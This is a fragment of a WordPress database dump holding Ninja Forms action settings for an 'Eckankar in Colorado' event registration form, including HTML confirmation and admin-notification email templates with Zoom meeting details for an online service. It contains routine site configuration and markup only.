</noscript>  <![endif]-->    <style>    table, td, div, h1, p {      font-family: Arial, sans-serif;    }    @media screen and (max-width: 530px) {      .unsub {        display: block;        padding: 8px;        margin-top: 14px;        border-radius: 6px;        background-color: #555555;        text-decoration: none !important;        font-weight: bold;      }      .col-lge {        max-width: 100% !important;      }    }    @media screen and (min-width: 531px) {      .col-sml {        max-width: 27% !important;      }      .col-lge {        max-width: 73% !important;      }    }  </style>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">ECK                                Light and Sound Service<br>                                Event Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<span style=\"color: #333333; font-size: 20px;\"></span><br>                                </span></p>                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You For Registering!                                  <br>                                </span></p>                              <p class=\"\" style=\"font-size: 18px;\">                                <b>You Are Signed Up                                  For The Following                                  Zoom Event:<br>                                  <span style=\"color: #23507d; font-size: 17px;\">ECK                                    Light &amp; Sound                                    Service - Online<br></span><span style=\"color: #23507d;font-size: 17px;\">10:30 AM to 11:30 AM MDT.</span></b></p>                              <p class=\"\" style=\"font-size: 19px; color: #f28a27;\"><strong>Zoom                                  Login Information:</strong></p>                              <strong>Meeting ID:</strong>                              834 9746 0655<br>                              <strong>Passcode: </strong>867156<br>                              <br>                              <strong>Join Zoom Meeting                                from a web browser:</strong><br>                              <a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a><br>                              <br>                              After you click the link,                              you will be prompted to                              either download the app                              to enter the meeting or                              enter through your                              browser. Please note that                              Zoom works best if you                              download the app. It is                              more stable and has more                              functions. Select use                              computer audio for sound.<br>                              <br>                              Please join the meeting 5                              - 10 minutes ahead of                              time to help us start on                              time. We look forward to                              seeing you at this online                              event.<br>                              <br>                              See you there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are receiving this                                email because you have                                submitted a request                                through the <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in Colorado website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you have any questions                                regarding the origin of                                this email, please feel                                free to get in touch,                                we\'re always happy to                                help out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img style=\"display: inline-block; color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar In Colorado -                                2021<br>                                <a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>','email_message','<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>ELSS REGISTRATION - USER CONFIRMATION</title>    <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {      font-family: Arial, sans-serif;    }    @media screen and (max-width: 530px) {      .unsub {        display: block;        padding: 8px;        margin-top: 14px;        border-radius: 6px;        background-color: #555555;        text-decoration: none !important;        font-weight: bold;      }      .col-lge {        max-width: 100% !important;      }    }    @media screen and (min-width: 531px) {      .col-sml {        max-width: 27% !important;      }      .col-lge {        max-width: 73% !important;      }    }  </style>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">ECK                                Light and Sound Service<br>                                Event Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<span style=\"color: #333333; font-size: 20px;\"></span><br>                                </span></p>                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You For Registering!                                  <br>                                </span></p>                              <p class=\"\" style=\"font-size: 18px;\">                                <b>You Are Signed Up                                  For The Following                                  Zoom Event:<br>                                  <span style=\"color: #23507d; font-size: 17px;\">ECK                                    Light &amp; Sound                                    Service - Online<br></span><span style=\"color: #23507d;font-size: 17px;\">10:30 AM to 11:30 AM MDT.</span></b></p>                              <p class=\"\" style=\"font-size: 19px; color: #f28a27;\"><strong>Zoom                                  Login Information:</strong></p>                              <strong>Meeting ID:</strong>                              834 9746 0655<br>                              <strong>Passcode: </strong>867156<br>                              <br>                              <strong>Join Zoom Meeting                                from a web browser:</strong><br>                              <a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a><br>                              <br>                              After you click the link,                              you will be prompted to                              either download the app                              to enter the meeting or                              enter through your                              browser. Please note that                              Zoom works best if you                              download the app. It is                              more stable and has more                              functions. Select use                              computer audio for sound.<br>                              <br>                              Please join the meeting 5                              - 10 minutes ahead of                              time to help us start on                              time. We look forward to                              seeing you at this online                              event.<br>                              <br>                              See you there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are receiving this                                email because you have                                submitted a request                                through the <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in Colorado website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you have any questions                                regarding the origin of                                this email, please feel                                free to get in touch,                                we\'re always happy to                                help out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img style=\"display: inline-block; color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar In Colorado -                                2021<br>                                <a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>'),(5485,184,'email_subject','Thank you for registering for our event','email_subject','Thank you for registering for our event'),(5486,184,'tag','','tag',''),(5487,184,'payment_total','0','payment_total','0'),(5488,184,'order','2','order','2'),(5489,184,'payment_gateways','','payment_gateways',''),(5490,184,'message','{all_fields_table}','message','{all_fields_table}'),(5491,184,'reply_to','','reply_to',''),(5492,184,'email_format','html','email_format','html'),(5493,184,'key','','key',''),(5494,184,'type','email','type','email'),(5495,184,'active','1','active','1'),(5496,184,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5497,184,'label','User Email Confirmation','label','User Email Confirmation'),(5498,184,'objectType','Action','objectType','Action'),(5499,184,'title','','title',''),(5500,184,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(5501,184,'editActive','','editActive',''),(5502,184,'to','{field:email}','to','{field:email}'),(5503,184,'objectDomain','actions','objectDomain','actions'),(5504,184,'from_name','','from_name',''),(5505,184,'from_address','{system:admin_email}','from_address','{system:admin_email}'),(5506,184,'cc','','cc',''),(5507,184,'bcc','','bcc',''),(5508,184,'attach_csv','','attach_csv',''),(5509,184,'parent_id','44','parent_id','44'),(5510,184,'email_message_plain','','email_message_plain',''),(5511,184,'drawerDisabled','','drawerDisabled',''),(5512,185,'drawerDisabled','','drawerDisabled',''),(5513,185,'title','','title',''),(5514,185,'key','','key',''),(5515,185,'type','email','type','email'),(5516,185,'active','1','active','1'),(5517,185,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5518,185,'label','Admin Email Notification','label','Admin Email Notification'),(5519,185,'objectType','Action','objectType','Action'),(5520,185,'objectDomain','actions','objectDomain','actions'),(5521,185,'editActive','','editActive',''),(5522,185,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(5523,185,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(5524,185,'message','{all_fields_table}','message','{all_fields_table}'),(5525,185,'order','2','order','2'),(5526,185,'payment_gateways','','payment_gateways',''),(5527,185,'payment_total','0','payment_total','0'),(5528,185,'tag','','tag',''),(5529,185,'email_subject','New Event Registration from {field:firstname} {field:lastname}','email_subject','New Event Registration from {field:firstname} {field:lastname}'),(5530,185,'email_message','      <meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New                                ELSS Web                                Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new ELSS registration                                  has been received. <span style=\"color: #333333; font-size: 20px;\"></span></p>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  ','email_message','      <meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New                                ELSS Web                                Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new ELSS registration                                  has been received. <span style=\"color: #333333; font-size: 20px;\"></span></p>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  '),(5531,185,'from_name','','from_name',''),(5532,185,'from_address','','from_address',''),(5533,185,'reply_to','{field:email}','reply_to','{field:email}'),(5534,185,'email_format','html','email_format','html'),(5535,185,'cc','','cc',''),(5536,185,'bcc','','bcc',''),(5537,185,'attach_csv','','attach_csv',''),(5538,185,'parent_id','44','parent_id','44'),(5539,185,'email_message_plain','','email_message_plain',''),(5540,186,'title','','title',''),(5541,186,'key','','key',''),(5542,186,'type','successmessage','type','successmessage'),(5543,186,'active','1','active','1'),(5544,186,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5545,186,'label','Success Message','label','Success Message'),(5546,186,'objectType','Action','objectType','Action'),(5547,186,'objectDomain','actions','objectDomain','actions'),(5548,186,'editActive','','editActive',''),(5549,186,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(5550,186,'order','1','order','1'),(5551,186,'payment_gateways','','payment_gateways',''),(5552,186,'payment_total','0','payment_total','0'),(5553,186,'tag','','tag',''),(5554,186,'to','{wp:admin_email}','to','{wp:admin_email}'),(5555,186,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5556,186,'email_message','{fields_table}','email_message','{fields_table}'),(5557,186,'from_name','','from_name',''),(5558,186,'from_address','','from_address',''),(5559,186,'reply_to','','reply_to',''),(5560,186,'email_format','html','email_format','html'),(5561,186,'cc','','cc',''),(5562,186,'bcc','','bcc',''),(5563,186,'attach_csv','','attach_csv',''),(5564,186,'redirect_url','','redirect_url',''),(5565,186,'success_msg','<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for our event!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email soon with Zoom Login information.</p>','success_msg','<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for our event!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email soon with Zoom Login information.</p>'),(5566,186,'parent_id','44','parent_id','44'),(5567,186,'email_message_plain','','email_message_plain',''),(5568,186,'submitter_email','','submitter_email',''),(5569,186,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5570,186,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5571,186,'set_subs_to_expire','0','set_subs_to_expire','0'),(5572,186,'subs_expire_time','90','subs_expire_time','90'),(5573,186,'drawerDisabled','','drawerDisabled',''),(5574,187,'title','','title',''),(5575,187,'key','','key',''),(5576,187,'type','save','type','save'),(5577,187,'active','1','active','1'),(5578,187,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5579,187,'label','Store Submission','label','Store Submission'),(5580,187,'objectType','Action','objectType','Action'),(5581,187,'objectDomain','actions','objectDomain','actions'),(5582,187,'editActive','','editActive',''),(5583,187,'order','3','order','3'),(5584,187,'payment_gateways','','payment_gateways',''),(5585,187,'payment_total','0','payment_total','0'),(5586,187,'tag','','tag',''),(5587,187,'to','{wp:admin_email}','to','{wp:admin_email}'),(5588,187,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5589,187,'email_message','{fields_table}','email_message','{fields_table}'),(5590,187,'from_name','','from_name',''),(5591,187,'from_address','','from_address',''),(5592,187,'reply_to','','reply_to',''),(5593,187,'email_format','html','email_format','html'),(5594,187,'cc','','cc',''),(5595,187,'bcc','','bcc',''),(5596,187,'attach_csv','','attach_csv',''),(5597,187,'redirect_url','','redirect_url',''),(5598,187,'parent_id','47','parent_id','47'),(5599,187,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(5600,187,'email_message_plain','','email_message_plain',''),(5601,187,'submitter_email','','submitter_email',''),(5602,187,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5603,187,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5604,187,'set_subs_to_expire','0','set_subs_to_expire','0'),(5605,187,'subs_expire_time','90','subs_expire_time','90'),(5606,188,'title','','title',''),(5607,188,'key','','key',''),(5608,188,'type','email','type','email'),(5609,188,'active','1','active','1'),(5610,188,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5611,188,'label','User Email Confirmation','label','User Email Confirmation'),(5612,188,'objectType','Action','objectType','Action'),(5613,188,'objectDomain','actions','objectDomain','actions'),(5614,188,'editActive','','editActive',''),(5615,188,'to','{field:email}','to','{field:email}'),(5616,188,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(5617,188,'message','{all_fields_table}','message','{all_fields_table}'),(5618,188,'order','2','order','2'),(5619,188,'payment_gateways','','payment_gateways',''),(5620,188,'payment_total','0','payment_total','0'),(5621,188,'tag','','tag',''),(5622,188,'email_subject','Thank you for registering for our event','email_subject','Thank you for registering for our event'),(5623,188,'email_message','<p>Your registration details are below:</p><p>{all_fields_table}<br></p>','email_message','<p>Your registration details are below:</p><p>{all_fields_table}<br></p>'),(5624,188,'from_name','','from_name',''),(5625,188,'from_address','{system:admin_email}','from_address','{system:admin_email}'),(5626,188,'reply_to','','reply_to',''),(5627,188,'email_format','html','email_format','html'),(5628,188,'cc','','cc',''),(5629,188,'bcc','','bcc',''),(5630,188,'attach_csv','','attach_csv',''),(5631,188,'parent_id','47','parent_id','47'),(5632,188,'email_message_plain','','email_message_plain',''),(5633,189,'title','','title',''),(5634,189,'key','','key',''),(5635,189,'type','email','type','email'),(5636,189,'active','1','active','1'),(5637,189,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5638,189,'label','Admin Email Notification','label','Admin Email Notification'),(5639,189,'objectType','Action','objectType','Action'),(5640,189,'objectDomain','actions','objectDomain','actions'),(5641,189,'editActive','','editActive',''),(5642,189,'to','{system:admin_email}','to','{system:admin_email}'),(5643,189,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(5644,189,'message','{all_fields_table}','message','{all_fields_table}'),(5645,189,'order','2','order','2'),(5646,189,'payment_gateways','','payment_gateways',''),(5647,189,'payment_total','0','payment_total','0'),(5648,189,'tag','','tag',''),(5649,189,'email_subject','New Event Registration from {field:firstname} {field:lastname}','email_subject','New Event Registration from {field:firstname} {field:lastname}'),(5650,189,'email_message','<p>Registration details are below:</p><p>{all_fields_table}<br></p>','email_message','<p>Registration details are below:</p><p>{all_fields_table}<br></p>'),(5651,189,'from_name','','from_name',''),(5652,189,'from_address','','from_address',''),(5653,189,'reply_to','{field:email}','reply_to','{field:email}'),(5654,189,'email_format','html','email_format','html'),(5655,189,'cc','','cc',''),(5656,189,'bcc','','bcc',''),(5657,189,'attach_csv','','attach_csv',''),(5658,189,'parent_id','47','parent_id','47'),(5659,189,'email_message_plain','','email_message_plain',''),(5660,190,'title','','title',''),(5661,190,'key','','key',''),(5662,190,'type','successmessage','type','successmessage'),(5663,190,'active','1','active','1'),(5664,190,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5665,190,'label','Success Message','label','Success Message'),(5666,190,'objectType','Action','objectType','Action'),(5667,190,'objectDomain','actions','objectDomain','actions'),(5668,190,'editActive','','editActive',''),(5669,190,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(5670,190,'order','1','order','1'),(5671,190,'payment_gateways','','payment_gateways',''),(5672,190,'payment_total','0','payment_total','0'),(5673,190,'tag','','tag',''),(5674,190,'to','{wp:admin_email}','to','{wp:admin_email}'),(5675,190,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5676,190,'email_message','{fields_table}','email_message','{fields_table}'),(5677,190,'from_name','','from_name',''),(5678,190,'from_address','','from_address',''),(5679,190,'reply_to','','reply_to',''),(5680,190,'email_format','html','email_format','html'),(5681,190,'cc','','cc',''),(5682,190,'bcc','','bcc',''),(5683,190,'attach_csv','','attach_csv',''),(5684,190,'redirect_url','','redirect_url',''),(5685,190,'success_msg','<p>Thank you for registering for our event.</p>','success_msg','<p>Thank you for registering for our event.</p>'),(5686,190,'parent_id','47','parent_id','47'),(5687,190,'email_message_plain','','email_message_plain',''),(5688,190,'submitter_email','','submitter_email',''),(5689,190,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5690,190,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5691,190,'set_subs_to_expire','0','set_subs_to_expire','0'),(5692,190,'subs_expire_time','90','subs_expire_time','90'),(5693,191,'key','','key',''),(5694,191,'title','','title',''),(5695,191,'type','save','type','save'),(5696,191,'active','1','active','1'),(5697,191,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5698,191,'label','Store Submission','label','Store Submission'),(5699,191,'objectType','Action','objectType','Action'),(5700,191,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(5701,191,'email_message_plain','','email_message_plain',''),(5702,191,'submitter_email','','submitter_email',''),(5703,191,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5704,191,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5705,191,'set_subs_to_expire','0','set_subs_to_expire','0'),(5706,191,'subs_expire_time','90','subs_expire_time','90'),(5707,191,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5708,191,'drawerDisabled','','drawerDisabled',''),(5709,191,'objectDomain','actions','objectDomain','actions'),(5710,191,'editActive','','editActive',''),(5711,191,'order','3','order','3'),(5712,191,'payment_gateways','','payment_gateways',''),(5713,191,'payment_total','0','payment_total','0'),(5714,191,'tag','','tag',''),(5715,191,'to','{wp:admin_email}','to','{wp:admin_email}'),(5716,191,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5717,191,'email_message','{fields_table}','email_message','{fields_table}'),(5718,191,'from_name','','from_name',''),(5719,191,'from_address','','from_address',''),(5720,191,'reply_to','','reply_to',''),(5721,191,'email_format','html','email_format','html'),(5722,191,'cc','','cc',''),(5723,191,'bcc','','bcc',''),(5724,191,'attach_csv','','attach_csv',''),(5725,191,'redirect_url','','redirect_url',''),(5726,191,'parent_id','44','parent_id','44'),(5727,192,'email_subject','Thank you for registering for our event','email_subject','Thank you for registering for our event'),(5728,192,'tag','','tag',''),(5729,192,'payment_total','0','payment_total','0'),(5730,192,'order','2','order','2'),(5731,192,'payment_gateways','','payment_gateways',''),(5732,192,'message','{all_fields_table}','message','{all_fields_table}'),(5733,192,'reply_to','','reply_to',''),(5734,192,'email_format','html','email_format','html'),(5735,192,'key','','key',''),(5736,192,'type','email','type','email'),(5737,192,'active','1','active','1'),(5738,192,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5739,192,'label','User Email Confirmation','label','User Email Confirmation'),(5740,192,'objectType','Action','objectType','Action'),(5741,192,'title','','title',''),(5742,192,'subject','Ninja Forms Submission','subject','Ninja Forms 